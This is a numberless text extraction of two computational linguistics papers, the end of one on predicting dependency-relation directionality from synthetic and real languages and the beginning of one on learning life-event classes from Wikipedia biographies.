. . advmod . . . . . cc . . . . . conj . mark . . . . . advcl . . . . . cop . . . . . aux . . . . . iobj . . . . . acl . . . . . nummod . . . . . xcomp . . . . neg . ccomp . . . . . avg. - . . . . table : accuracy on the simpler task of binary classification of relation directionality. the most common relations are shown first: the “rate” column gives the average rate of the relation across the training languages (like the x coordinate in fig. ). over languages) and by language (equal average over relations). keep in mind that these systems had not been specifically trained to place relations on the correct side of the artificial . boundary. binary classification is an easier task. it is easy because, as the ∅ column in table indicates, most relations have a clear directionality preference shared by most of the ud languages. as a result, the better models with more features have less opportu- nity to help. nonetheless, they do perform better, and the ec heuristic continues to perform worse. in particular, ec fails significantly on dobj and iobj. this is because nsubj, dobj, and iobj often have different directionalities (e.g., in svo languages), but the ec heuristic will tend to pre- dict the same direction for all of them, according to whether nouns tend to precede nearby verbs. . final evaluation on test data all previous experiments were conducted by cross- validation on the training languages. we now train the system on all , and report results on the blind test languages (table ). in our evaluation metric ( ), r includes all relation types that ap- pear in training data, plus a special unk type for target ec ∅ ud +gd ar . . . . bg . . . . cs . . da . . . . de . . . . en . es . . . . et . . . . fi . . . . fr . . . . got . . . . grc . . . . grc proiel . . . . hi . . . . it . . . . la itt . . . . la proiel . . . . nl . . . . no . . pt . . . . avg. . . . . table : accuracy on the simpler task of binary classification of relation directionality for each training language. a detailed comparison shows that ec is significantly worse than ud and +gd, and that ∅ is significantly worse than +gd (paired permu- tation test over the languages, p < . ). the improvement from ud to +gd is insignificant, which suggests that this is an easier task where weak models might suffice. relations that appear only in test data. the results range from good to excellent, with synthetic data providing consistent and often large improvements. these results could potentially be boosted in the future by using an even larger and more diverse training set. in principle, when evaluating on any one of our real languages, one could train a sys- tem on all of the other (plus the galactic lan- guages derived from them), not just . moreover, the universal dependencies collection has contin- ued to grow beyond the languages used here (§ ). finally, our current setup extracts only one training example from each (real or synthetic) language. one could easily generate a variant of this example each time the language is visited during stochastic opti- mization, by bootstrap-resampling its training cor- pus (to add “natural” variation) or subsampling it (to train the predictor to work on smaller corpora). in the case of a synthetic language, one could also gen- erate a corpus of new trees each time the language is visited (by re-running the stochastic permutation procedure, instead of reusing the particular permuta- tion released by the galactic dependencies project). test train target ud +gd target ud +gd cu . . ar . . el . . 
bg . . eu . . cs . . fa . . da . . fi ftb . . de . . ga . . en . . he . . es . . hr . . et . . hu . . fi . . id . . fr . . ja ktc . . got . . la . . grc . . pl . . grc proiel . . ro . . hi . . sl . . it . . sv . . la itt . . ta . . la proiel . . nl . . no . . pt . . test avg. . . * all avg. . . * table : our final comparison on the test languages appears at left. we ask whether the average expected loss on these real target languages is reduced by augmenting the training pool of ud languages with + * * gd languages. for com- pleteness, we extend the table with the cross-validation results on the training pool. the “avg.” lines report the average of test or training+testing languages. we mark both “+gd” av- erages with “*” as they are significantly better than their “ud” counterparts (paired permutation test by language, p < . ). related work typological properties can usefully boost the per- formance of cross-linguistic systems (bender, ; o’horan et al., ). these systems mainly aim to annotate low-resource languages with help from models trained on similar high-resource languages. naseem et al. ( ) introduce a “selective shar- ing” technique for generative parsing, in which a subject-verb language will use parameters shared with other subject-verb languages. täckström et al. ( ) and zhang and barzilay ( ) extend this idea to discriminative parsing and gain further im- provements by conjoining regular parsing features with typological features. the cross-linguistic neu- ral parser of ammar et al. ( ) conditions on ty- pological features by supplying a “language embed- ding” as input. zhang et al. ( ) use typological properties to convert language-specific pos tags to ud pos tags, based on their ordering in a corpus. moving from engineering to science, lin- guists seek typological universals of human lan- guage (greenberg, ; croft, ; song, ; hawkins, ), e.g., “languages with domi- nant verb-subject-object order are always preposi- tional.” dryer and haspelmath ( ) characterize world languages with typological proper- ties. their wals database can supply features to nlp systems (see previous paragraph) or gold stan- dard labels for typological classifiers. daumé iii and campbell ( ) take wals as input and propose a bayesian approach to discover new universals. georgi et al. ( ) impute missing properties of a language, not by using universals, but by backing off to the language’s typological cluster. murawaki ( ) use wals to help recover the evolutionary tree of human languages; daumé iii ( ) consid- ers the geographic distribution of wals properties. attempts at automatic typological classification are relatively recent. lewis and xia ( ) pre- dict typological properties from induced trees, but guess those trees from aligned bitexts, not by mono- lingual grammar induction as in § . . liu ( ) and futrell et al. ( ) show that the directional- ity of (gold) dependencies is indicative of “basic” word order and freeness of word order. those papers predict typological properties from trees that are au- tomatically (noisily) annotated or manually (expen- sively) annotated. an alternative is to predict the ty- pology directly from raw or pos-tagged text, as we do. saha roy et al. ( ) first explored this idea, building a system that correctly predicts adposition typology on / languages with only word co- occurrence statistics. zhang et al. ( ) evaluate semi-supervised pos tagging by asking whether the induced tag sequences can predict typological prop- erties. 
their prediction approach is supervised like ours, although developed separately and trained on different data. they more simply predict binary- valued wals properties, using independent bi- nary classifiers based on pos bigram and trigrams. our task is rather close to grammar induction, which likewise predicts a set of real numbers giv- ing the relative probabilities of competing syntactic configurations. most previous work on grammar in- duction begins with maximum likelihood estimation of some generative model—such as a pcfg (lari and young, ; carroll and charniak, ) or dependency grammar (klein and manning, )— though it may add linguistically-informed inductive bias (ganchev et al., ; naseem et al., ). most such methods use local search and must wres- tle with local optima (spitkovsky et al., ). fine- grained typological classification might supplement this approach, by cutting through the initial com- binatorial challenge of establishing the basic word- order properties of the language. in this paper we only quantify the directionality of each relation type, ignoring how tokens of these relations interact lo- cally to give coherent parse trees. grammar induc- tion methods like em could naturally consider those local interactions for a more refined analysis, when guided by our predicted global directionalities. conclusions and future work we introduced a typological classification task, which attempts to extract quantitative knowledge about a language’s syntactic structure from its sur- face forms (pos tag sequences). we applied super- vised learning to this apparently unsupervised prob- lem. as far as we know, we are the first to utilize synthetic languages to train a learner for real lan- guages: this move yielded substantial benefits. figure shows that we rank held-out languages rather accurately along a spectrum of directionality, for several common dependency relations. table shows that if we jointly predict the directionalities of all the relations in a new language, most of those numbers will be quite close to the truth (low aggre- gate error, weighted by relation frequency). this holds promise for aiding grammar induction. our trained model is robust when applied to noisy pos tag sequences. in the future, however, we would like to make similar predictions from raw word sequences. that will require features that ab- stract away from the language-specific vocabulary. although recurrent neural networks in the present paper did not show a clear advantage over hand- engineered features, they might be useful when used with word embeddings. finally, we are interested in downstream uses. several nlp tasks have benefited from typologi- cal features (§ ). by using end-to-end training, our methods could be tuned to extract features (existing or novel) that are particularly useful for some task. although wang and eisner ( ) review uses of synthetic training data elsewhere in machine learning. acknowledgements this work was funded by the u.s. national science foundation under grant no. . we are grateful to the state of maryland for providing indispensable computing resources via the maryland advanced research computing cen- ter (marcc). we thank the argo lab members for useful discussions. finally, we thank tacl action editor mark steedman and the anonymous review- ers for high-quality suggestions, including the ec baseline and the binary classification evaluation. references waleed ammar, george mulcaire, miguel balles- teros, chris dyer, and noah smith. many lan- guages, one parser. 
transactions of the associ- ation of computational linguistics, : – , . emily m. bender. linguistically naı̈ve != language independent: why nlp needs linguistic typol- ogy. in proceedings of the eacl workshop on the interaction between linguistics and com- putational linguistics: virtuous, vicious or vacu- ous?, pages – , . glenn carroll and eugene charniak. two experi- ments on learning probabilistic dependency gram- mars from corpora. in working notes of the aaai workshop on statistically-based nlp techniques, pages – , . kyunghyun cho, bart van merrienboer, dzmitry bahdanau, and yoshua bengio. on the properties of neural machine translation: encoder-decoder approaches. in proceedings of eighth workshop on syntax, semantics and structure in statistical translation, pages – , . noam chomsky. lectures on government and bind- ing: the pisa lectures. holland: foris publica- tions, . noam chomsky and howard lasnik. the theory of principles and parameters. in syntax: an inter- national handbook of contemporary research, joachim jacobs, arnim von stechow, wolfgang sternefeld, and theo vennemann, editors. berlin: de gruyter, . william croft. typology and universals. cambridge university press, . hal daumé iii. non-parametric bayesian areal lin- guistics. in proceedings of human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – , . hal daumé iii and lyle campbell. a bayesian model for discovering typological implications. in proceedings of the th annual meeting of the association of computational linguistics, pages – , . matthew s. dryer and martin haspelmath, editors. the world atlas of language structures online. max planck institute for evolutionary anthropol- ogy, leipzig, . http://wals.info/. joakim nivre, et al. universal dependencies . . lindat/clarin digital library at the institute of formal and applied linguistics, charles uni- versity in prague. data available at http:// universaldependencies.org, . robert frank and shyam kapur. on the use of trig- gers in parameter setting. linguistic inquiry, : – , . richard futrell, kyle mahowald, and edward gib- son. quantifying word order freedom in depen- dency corpora. in proceedings of the third inter- national conference on dependency linguistics, pages – , . kuzman ganchev, joao graça, jennifer gillenwater, and ben taskar. posterior regularization for struc- tured latent variable models. journal of machine learning research, : – , . ryan georgi, fei xia, and william lewis. com- paring language similarity across genetic and typologically-based groupings. in proceedings of the rd international conference on computa- tional linguistics, pages – , . edward gibson and kenneth wexler. triggers. lin- guistic inquiry, ( ): – , . xavier glorot and yoshua bengio. understanding the difficulty of training deep feedforward neu- ral networks. in proceedings of the international conference on artificial intelligence and statis- tics, . joseph h. greenberg. some universals of grammar with particular reference to the order of mean- ingful elements. in universals of language, joseph h. greenberg, editor, pages – . mit press, . john a. hawkins. word order universals. elsevier, . sepp hochreiter and jürgen schmidhuber. long short-term memory. neural computation, ( ): – , . dan klein and christopher manning. corpus-based induction of syntactic structure: models of depen- dency and constituency. 
in proceedings of the nd annual meeting of the association for com- putational linguistics, pages – , . karim lari and steve j. young. the estimation of stochastic context-free grammars using the inside-outside algorithm. computer speech and language, ( ): – , . phong le and willem zuidema. unsupervised de- pendency parsing: let’s use supervised parsers. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , . william d. lewis and fei xia. automatically iden- tifying computationally relevant typological fea- tures. in proceedings of the third international joint conference on natural language process- ing: volume-ii, . haitao liu. dependency direction as a means of word-order typology: a method based on de- pendency treebanks. lingua, ( ): – , . david mareček and milan straka. stop-probability estimates computed on a large corpus improve un- supervised dependency parsing. in proceedings of the st annual meeting of the association for computational linguistics (volume : long pa- pers), pages – , . yugo murawaki. continuous space representations of linguistic typology and their application to phy- logenetic inference. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , . tahira naseem, harr chen, regina barzilay, and mark johnson. using universal linguistic knowl- edge to guide grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , . tahira naseem, regina barzilay, and amir glober- son. selective sharing for multilingual depen- dency parsing. in proceedings of the th an- nual meeting of the association for computa- tional linguistics (volume : long papers), pages – , . dat quoc nguyen, dai quoc nguyen, dang duc pham, and son bao pham. rdrpostagger: a ripple down rules-based part-of-speech tagger. in proceedings of the demonstrations at the th conference of the european chapter of the asso- ciation for computational linguistics, pages – , . hiroshi noji, yusuke miyao, and mark johnson. using left-corner parsing to encode universal structural constraints in grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , . helen o’horan, yevgeni berzak, ivan vulic, roi reichart, and anna korhonen. survey on the use of typological information in natural language processing. in proceedings of the th interna- tional conference on computational linguistics: technical papers, pages – , . rishiraj saha roy, rahul katare, niloy ganguly, and monojit choudhury. automatic discovery of adposition typology. in proceedings of the th international conference on computational linguistics: technical papers, pages – , . jae jung song. linguistic typology: morphology and syntax. routledge, . valentin i. spitkovsky, hiyan alshawi, and daniel jurafsky. from baby steps to leapfrog: how “less is more” in unsupervised dependency parsing. in human language technologies: the an- nual conference of the north american chapter of the association for computational linguistics, pages – , . valentin i. spitkovsky, hiyan alshawi, and daniel jurafsky. breaking out of local optima with count transforms and model recombination: a study in grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , . oscar täckström, ryan mcdonald, and joakim nivre. 
target language adaptation of discrimina- tive transfer parsers. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , . tijmen tieleman and geoffrey hinton. lecture . —rmsprop: divide the gradient by a running average of its recent magnitude. coursera: neural networks for machine learning, . dingquan wang and jason eisner. the galac- tic dependencies treebanks: getting more data by synthesizing new languages. transactions of the association of computational linguistics, : – , . data available at https:// github.com/gdtreebank/gdtreebank. yuan zhang and regina barzilay. hierarchical low- rank tensors for multilingual transfer parsing. in proceedings of the conference on empirical methods in natural language processing, pages – , . yuan zhang, roi reichart, regina barzilay, and amir globerson. learning to map into a uni- versal pos tagset. in proceedings of the joint conference on empirical methods in nat- ural language processing and computational natural language learning, pages – , . yuan zhang, david gaddy, regina barzilay, and tommi jaakkola. ten pairs to tag—multilingual pos tagging via coarse mapping between embed- dings. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , . unsupervised discovery of biographical structure from text david bamman school of computer science carnegie mellon university pittsburgh, pa , usa dbamman@cs.cmu.edu noah a. smith school of computer science carnegie mellon university pittsburgh, pa , usa nasmith@cs.cmu.edu abstract we present a method for discovering abstract event classes in biographies, based on a prob- abilistic latent-variable model. taking as in- put timestamped text, we exploit latent corre- lations among events to learn a set of event classes (such as born, graduates high school, and becomes citizen), along with the typical times in a person’s life when those events occur. in a quantitative evalua- tion at the task of predicting a person’s age for a given event, we find that our genera- tive model outperforms a strong linear regres- sion baseline, along with simpler variants of the model that ablate some features. the ab- stract event classes that we learn allow us to perform a large-scale analysis of , wikipedia biographies. though it is known that women are greatly underrepresented on wikipedia—not only as editors (wikipedia, ) but also as subjects of articles (reagle and rhue, )—we find that there is a bias in their characterization as well, with biogra- phies of women containing significantly more emphasis on events of marriage and divorce than biographies of men. introduction the written text that we interact with on an everyday basis—news articles, emails, social media, books— contains a vast amount of information centered on people: news (including common nlp corpora such as the new york times and the wall street journal) details the roles of actors in current events, social media (including twitter and facebook) documents the actions and attitudes of friends, and books chron- icle the stories of fictional characters and real people alike. 
this focus on people gives us an abundance of information on how the lives of those portrayed un- fold; for corpora that include historically deep bi- ographical information (such as wikipedia, book- length biographies and autobiographies, and even newspaper obituaries) this data includes the actors involved in particular historical events and the times and places in which they occur. the life events de- scribed in these texts have natural structure: event classes exhibit correlations with each other (e.g., those who divorce must have been married), can occur at roughly similar times in the lives of dif- ferent individuals (marriage is more likely to oc- cur earlier in one’s life than later), and can be bound to historical moments as well (fights in world war ii peaks in the early s). social scientists have long been interested in the structure of these events in investigating the role that individual agency and larger social forces play in shaping the course of an individual’s life. life stages marking “transitions to adulthood” (such as leaving school, entering the workforce and marriage) have important correlates with de- mographic variables (modell et al., ; hogan and astone, ; shanahan, ); and researchers study the interactional effects that life events have on each other, such as the relationship between di- vorce and pre-marital cohabitation (lillard et al., ; reinhold, ) or having children (lillard and waite, ). the data on which these studies draw, however, has largely been restricted to categorical surveys and observational data; we present here a latent- variable model that exploits the correlations of event descriptions in text to learn the structure of abstract events, grounded in time, from text alone. while our transactions of the association for computational linguistics, ( ) – . action editor: jian su. submitted / ; published / . c© association for computational linguistics. model can be estimated on any set of texts where the birth dates of a set of mentioned entities are known, we illustrate our method on a large-scale dataset of , biographies extracted from wikipedia. this paper makes two contributions: first, we present a general unsupervised model for learning life event classes from biographical text, along with the structure that binds them; second, in using this method to learn event classes from wikipedia, we uncover evidence of systematic bias in the presen- tation of male and female biographies (with biogra- phies of women containing significantly dispropor- tionate emphasis on the personal events of mar- riage and divorce). in addition to these contribu- tions, we also present a range of other analyses that uncovering life events in text can make possible. data and code to support this work can be found at http://www.ark.cs.cmu.edu/bio/. data the data for this analysis originates in the january , dump of english-language wikipedia. we extract biographies by identifying all articles with persondata metadata in which the date of birth field is known. this results in a set of , biographies. 
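As a rough illustration of this filtering step, the sketch below scans article wikitext for a Persondata block with a usable date-of-birth field. The regular expressions, the field spelling, and the iterable of (title, wikitext) pairs are hypothetical stand-ins for whatever dump-parsing machinery is actually used; this is not the authors' code.

```python
import re

# Hypothetical template form: {{Persondata | NAME = ... | DATE OF BIRTH = 8 June 1867 | ...}}
PERSONDATA_RE = re.compile(r"\{\{\s*Persondata(.*?)\}\}", re.IGNORECASE | re.DOTALL)
DOB_RE = re.compile(r"DATE OF BIRTH\s*=\s*([^|\}]+)", re.IGNORECASE)
YEAR_RE = re.compile(r"\b(\d{3,4})\b")

def birth_year(wikitext):
    """Return the subject's birth year if a Persondata block with a
    parseable DATE OF BIRTH field is present, otherwise None."""
    block = PERSONDATA_RE.search(wikitext)
    if not block:
        return None
    dob = DOB_RE.search(block.group(1))
    if not dob:
        return None
    year = YEAR_RE.search(dob.group(1))
    return int(year.group(1)) if year else None

def collect_biographies(articles):
    """articles: iterable of (title, wikitext) pairs supplied by some dump
    reader (assumed to exist elsewhere). Keeps only articles whose subject
    has a known birth year, mapping title -> birth year."""
    return {title: y for title, text in articles
            if (y := birth_year(text)) is not None}
```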
for each biography, we perform part-of-speech tagging using the stanford pos tagger (toutanova et al., ) and named entity recognition using the stanford named entity recognizer (finkel et al., ), cluster all mentions of co-referring proper names (davis et al., ; elson et al., ) and resolve pronominal co-reference (bamman et al., ), aided by gender inference for each entity as the gender corresponding to the maximum number of gendered pronouns (i.e., he and she) mentioned in the article, as also used by reagle and rhue ( ). in a random test set of articles, this method of gender inference is overwhelmingly ac- curate, achieving % precision with . % recall ( articles had no pronominal mentions and so gen- der is not assigned). http://dumps.wikimedia.org/enwiki/ /enwiki- -pages-articles. xml.bz “persondata is a special set of metadata that can and should be added to biographical articles only” (http://en. wikipedia.org/wiki/wikipedia:persondata). as further preprocessing, we identify multiword expressions in all texts as maximal sequences of adjective + noun part of speech tags (yielding, for example, new york, united states, early life and high school), as first described in justeson and katz ( ). for each biographical article, we then ex- tract all sentences in which the subject of the ar- ticle is mentioned along with a single date and re- tain only the terms in each sentence that are among the most frequent , unigrams and multiword expressions in all documents, excluding stopwords such as the and all numbers (including dates). an “event” is the bag of these unigrams and multiword expressions extracted from one such sentence, along with a corresponding timestamp measured as the dif- ference between the observed date in the sentence and the date of birth of the entity. table illustrates the actual form of the data with a sample of extracted sentences from the biography of frank lloyd wright, along with the data as input to the model. in the terminology of the model de- scribed below, each sentence constitutes one “event” in the subject’s life. for the final dataset we retain all biographies where the subject of the article is born after the year and for which there exist at least events ( , people). the complete data consists of , , events across these , people. model the quantities of interest that we want to learn from the data are: .) a broad set of major life events recorded in wikipedia biographies that people expe- rience at similar stages in their lives (such as being born, graduating high school, serving in the army, getting married, and so on); .) correlations among those life events (e.g., knowing that if an individual wins a nobel prize that they’re more likely to receive an honorary doctorate); and .) an attribution of those classes of events to particular moments in a specific indi- vidual’s life (e.g., john nash received an hon- orary doctorate in ). we cast this problem as an unsupervised learning one; given no labeled instances, can we infer these quantities from text alone? one possible alterna- tive approach would be to leverage the categorical original sentence data as input to model terms (w) time (t) he was admitted to the university of wisconsin– madison as a special student in . admitted university wisconsin madison special student wright first traveled to japan in , where he bought hundreds of prints. 
wright first traveled japan bought hundreds prints after wright’s return to the united states in octo- ber , wright persuaded his mother to buy land for him in spring green, wisconsin. wright return united states wright persuaded mother buy land spring green wisconsin this philosophy was best exemplified by his design for fallingwater ( ), which has been called “the best all-time work of american architecture”. philosophy best design called best all-time work american architecture already well known during his lifetime, wright was recognized in by the american institute of architects as “ the greatest american architect of all time.” already well known lifetime wright recognized american institute architects greatest american architect time table : a sample of of the sentences (original and converted) that constitute the data for frank lloyd wright (born ). each event is defined as one such temporally-scoped sentence. information contained in wikipedia biographies (or its derivatives, such as freebase; google, ) as a form of supervision (e.g., george washington is a member of the categories presidents of the united states and american cartographers, among others). these manual categories, however, are often spo- radically annotated and have a long tail (with most categories appearing very few times); in learning event structure directly from text, we avoid relying on categories’ accuracy and being constrained by a fixed ontology. one advantage of an unsupervised approach is that we eliminate the need to define a pre-determined set of event classes a priori, allow- ing application across a variety of different domains and time periods, such as full-text books from the internet archive or hathi trust, or historical works like the oxford dictionary of national biography (matthew and harrison, ). figure a illustrates the graphical form of our hi- erarchical bayesian model, which articulates the re- lationship between an entity’s set of events (where each event is an observation defined as the bag of terms in text and the difference between the year it was recorded as happening and the birth year), an abstract set of event classes, correlations among those abstract classes, and the distribution of vocab- ulary terms that defines each one. to capture corre- lations among different classes, we place a logistic normal prior on each biography’s distribution over event classes (blei and lafferty, a; blei and lafferty, ; mimno et al., ); unlike a dirich- let, a logistic normal is able to capture arbitrary cor- relations between elements through the structure of the covariance matrix of its underlying multivariate normal. we take a bayesian approach to estimating the mean µη and covariance Ση, drawing them from a conjugate normal-inverse wishart prior. the generative story for the model runs as fol- lows: let k be the number of latent event classes, p be the number of biographies, and ep be the number of events in biography p. • draw event class means and covariances µη ∈ rk, Ση ∈ rk×k ∼ normal-inverse wishart(µ ,λ, Ψ,ν) • for each event class i ∈{ , . . . ,k}: - draw event-term distribution φk ∼ dir(γ) • for each biography p: - draw ηp ∼n(µη, Ση) - convert ηp into biography-event proportions βp through the softmax function: βp,i = exp(ηp,i)∑k k= exp(ηp,k) - for each event e in biography p: - draw event class index z ∼ mult(βp) - draw timestamp t ∼n(µz,σ z) - for each token in event e: - draw term w ∼ mult(φz) z w t η µη Ση niw φ γ σ µ w e p (a) full. z w t η α φ γ σ µ w e p (b) –correlation. 
η ∼ dir(α) z w η µη Ση niw φ γ w e p (c) –time z w η α φ γ w e p (d) –correlation, –time. η ∼ dir(α) figure : graphical form of the full model (described in § ) and models with ablations (described in § ). inference proceeds via stochastic em: after ini- tializing all variables to random values, we alter- nate between collapsed gibbs sampling for the la- tent class indicators followed by maximization steps over all other parameters: . sample all z using collapsed gibbs sampling conditioned on current values for η and all other z. . for each biography p, maximize likelihood with respect to ηp via gradient ascent given the current samples of z and priors µη and Ση. . assign map estimates of µη and Ση given current values of η and the normal-inverse wishart prior. update µ and σ according to its maximum likelihood estimate given z. we describe the technical details of each step be- low. sampling z. given fixed biography-event class proportions η, observed tokens w, timestamp t, and current samples z− for all other events, the proba- bility of a given event belonging to event class k is as follows: p(z = k | z−,w,t,η,γ,µ,σ ) ∝ exp(ηk) ×σ− k exp ( −(t−µk) σ k ) × ∏v v= ∏e(v) i= (γ + c −(k,v) + i− ) ∏ne n= (v γ + c −(k,?) + n− ) ( ) here c−(k,v) is the count of the number of times vocabulary term v shows up in all events whose cur- rent sample z = k (excepting the current one being sampled), c−(k,?) is the total count of all terms in all events whose current z = k (again excepting the current one), ne is the number of terms in event e, and e(v) is the count of vocabulary term v in the cur- rent event. (note the complexity of the last term is due to drawing multiple observations from a single collapsed multinomial; carpenter, .) maximizing η. under our model, the terms in the likelihood function that involve η include the likeli- hood of the samples drawn from it and its own prob- ability given the multivariate normal prior: l(η) ∝ n∏ n= exp(ηzn )∑k k= exp(ηk) ×n(η | µη, Ση) ( ) the log likelihood is proportional to: `(η) ∝ n∑ n= ηzn − n∑ n= k∑ k= exp(ηk) − (η −µη)> Σ− η (η −µη) ( ) given samples of the latent event class z for all events in biography p, we maximize the value of ηp using gradient ascent. we can think of this as maxi- mizing the likelihood of the observations z subject to ` (gaussian) regularization, where the covariance matrix in the regularizer encourages correlations in η: if a document contains many examples of z = k and zk is highly correlated with zj, then the optimal η is encouraged to contain high weights at both ηk and ηj rather than simply ηk alone. maximizing µη, Ση,µ,σ . given values for η, we then find maximum a posteriori estimates of µη and Ση conditioned on the normal-inverse wishart (niw) prior. the niw is a conjugate prior to a mul- tivariate gaussian, parameterized by dimensionality k, initial mean µ , positive-definite scale matrix Ψ, and scalars ν > k − and λ > . the prior parameters Ψ and ν have an intuitive interpretation as the scatter matrix ∑ν i= (xi − x̄) (xi − x̄) > for ν pseudo-observations. the expected value of the covariance matrix drawn from a niw distribution parameterized by Ψ and ν is Ψ ν−k− . 
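The sampling distribution above translates directly into code. The following is a minimal sketch of the per-event class weight and resampling step, assuming plain Python dictionaries for the count statistics; it is illustrative only and not the authors' implementation.

```python
import math
import random

def class_weight(k, eta, t, mu, sigma2, event_counts, c_kv, c_k, V, gamma):
    """Unnormalized p(z = k | everything else) for a single event, following
    the three factors of the collapsed sampling equation above. The event's
    own tokens are assumed to have already been subtracted from the class
    counts c_kv and c_k (the "minus" counts)."""
    # Factor 1: the biography's (unnormalized) preference for class k.
    w = math.exp(eta[k])
    # Factor 2: Gaussian likelihood of the event's timestamp under class k.
    w *= math.exp(-(t - mu[k]) ** 2 / (2.0 * sigma2[k])) / math.sqrt(sigma2[k])
    # Factor 3: collapsed Dirichlet-multinomial term over the event's tokens.
    for v, count in event_counts.items():        # event_counts: {vocab id: count}
        for i in range(count):
            w *= gamma + c_kv.get((k, v), 0) + i
    for n in range(sum(event_counts.values())):
        w /= V * gamma + c_k.get(k, 0) + n
    return w

def resample_event(eta, t, mu, sigma2, event_counts, c_kv, c_k, V, gamma):
    """Draw a new class indicator with probability proportional to the weights."""
    K = len(eta)
    weights = [class_weight(k, eta, t, mu, sigma2, event_counts, c_kv, c_k, V, gamma)
               for k in range(K)]
    return random.choices(range(K), weights=weights)[0]
```

In practice the products would be accumulated in log space to avoid numerical underflow, but the structure of the update is the same.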
to disprefer correlations among topics in the absence of strong evidence, we fix µ = and set Ψ so that this prior expectation over Ση is the product of a scalar value ρ and the iden- tity matrix i: Ψ = (ν − k − )ρi; ρ defines the expected variance, and the higher the value of ν, the more strongly the prior dominates the posterior es- timate of the covariance matrix (i.e., the more the covariance matrix is shrunk toward ρi). λ likewise has an intuitive understanding as a dampening pa- rameter: the higher its value, the more the posterior estimate of the mean µ̂ shrinks toward . for n data points, we set λ = n/ , ν = k + , and ρ = . since the niw is conjugate with the multivariate normal, posterior updates to µη and Ση have closed- form expressions given values of η (here, η̄ denotes the mean value of η over all biographies). µ̂η = n λ + n η̄ ( ) Σ̂η = Ψ + ∑n i= (ηi − η̄) (ηi − η̄) > + λn λ+n η̄η̄> ν + n + k + ( ) since we have no meaningful prior information on the values of µ and σ , we calculate their maximum likelihood estimate given current samples z. evaluation while the goal of this work is to learn qualitative categories of life events from text, we can quantita- tively evaluate the performance of our model on the empirical task of predicting the age in a person’s life when an event occurs. for this task, we compare the full model described above with a strong baseline of ` -regularized linear regression and also with comparable models with feature ablations, in order to quantify the extent to which various aspects of the full model are con- tributing to its empirical performance. the compa- rable ablated models include the following: • –correlation, figure b. rather than a lo- gistic normal prior on the entity-specific distri- bution over event types (η), we draw η from a symmetric dirichlet distribution parameterized by a global α. in a dirichlet distribution, arbi- trary correlations cannot be captured. • –time, figure c. in the full model, the time- stamps of the observed events influence the event classes we learn by encouraging them to be internally coherent and time-sensitive. to test this design choice, we ablate time as a fea- ture during inference. • –correlation,–time, figure d. we also test a model that ablates both the correlation structure in the prior and the influence of time; this model corresponds to smoothed, unsuper- vised naı̈ve bayes. as during inference, we define an event to be the set of terms, excluding stopwords and numbers, that are present in the vocabulary of the , most fre- quent words and multiword expressions in the data overall. each event is accompanied by the year of its occurrence, from which we calculate the gold target prediction (the age of the person at the time of the event) as the year minus the entity’s year of birth. for all of the four models described above (the full model and three ablations), we train the model on / of the biographies ( , entities, on average , , events); we split the remaining / of the biographies into development data (where t is ob- served) and test data (where t is predicted). the de- tails of inference for each model are as follows: . full. inference as above for a burn-in period of iterations, using slice sampling (neal, ) to optimize the value of the dirichlet hy- perparameter γ every iterations; after infer- ence, the parameters µη, Ση,µ,σ and φ are es- timated from samples drawn at the final itera- tion and held fixed. 
for test entities, we infer the map value of η using development data, and predict the age of each test event as the mean time marginalizing over the event type in- dicator z. t̂ = ez[µz]. . –correlation. here we perform collapsed gibbs sampling for iterations, using slice sampling to optimize the value of α and γ ev- ery iterations; after inference, the parame- ters µ,σ and φ are estimated from single final samples and held fixed. for development and test data, we run gibbs sampling on event indi- cators z for iterations and predict the age of each test event as the mean time marginalizing over the event type indicator z. t̂ = ez[µz]. . –time. inference as above for iterations, using slice sampling to optimize the value of γ every iterations; after inference, the pa- rameters µη, Ση and φ are estimated from sin- gle final samples and held fixed. since time is not known to this model during inference, we create post hoc estimates of µ̂z as the empirical mean age of events sampled to event class z us- ing single samples for each event in the training data from the final sampling iteration. for test entities, we infer the map value of η using de- velopment data, and predict the age of each test event as the average empirical age marginaliz- ing over the event type indicator z. t̂ = ez[µ̂z]. . –correlation,–time. we perform infer- ence as above for the –correlation model, and time prediction as in the –time model. t̂ = ez[µ̂z]. to compare against a potentially more powerful discriminative model, we also evaluate linear regres- sion with ` (ridge) regularization, using binary indi- cators of the same unigrams and multiword expres- sions available to the models above. . linear regression. train on training and development data, optimizing the regulariza- tion coefficient λ in three-fold cross-validation. during training, linear regression learns that the terms most indicative of events that take place later in life are stamp, descendant, commemorated, died, plaque, grandson, and lifetime achievement award, while those that denote early events are born, bap- tised, apprenticed, and acting debut. we evaluate all models on identical splits using -fold cross validation. for an interpretable error score, we use mean absolute error, which corre- sponds to the number of years, on average, by which each model is incorrect. mae = n n∑ i= ∣∣t̂− ti ∣∣ ( ) figure presents the results of this evaluation for all models and different choices of the number of latent event classes k ∈ { , , , , , }. lin- ear regression represents a powerful model, achiev- ing a mean absolute error of . years across all folds, but is eclipsed by the latent variable model at k ≥ . the correlations captured by the logis- tic normal prior make a clear difference, uniformly yielding improvements over otherwise equivalent dirichlet models across all k. as expected, mod- els trained without knowledge of time during infer- ence perform less well than models that contain that information. number of event classes (log scale) m ea n ab so lu te e rr or ( ye ar s) model linear regression full model ablation: -time ablation: -correlation ablation: -correlation, -time figure : mean average error (in years) for time pre- diction. analysis to analyze the latent event classes in wikipedia bi- ographies, we train our full model (with a logis- tic normal prior and time as an observable vari- able) on the full dataset of , biographies with age µ age σ % fem. most probable terms in class . . . 
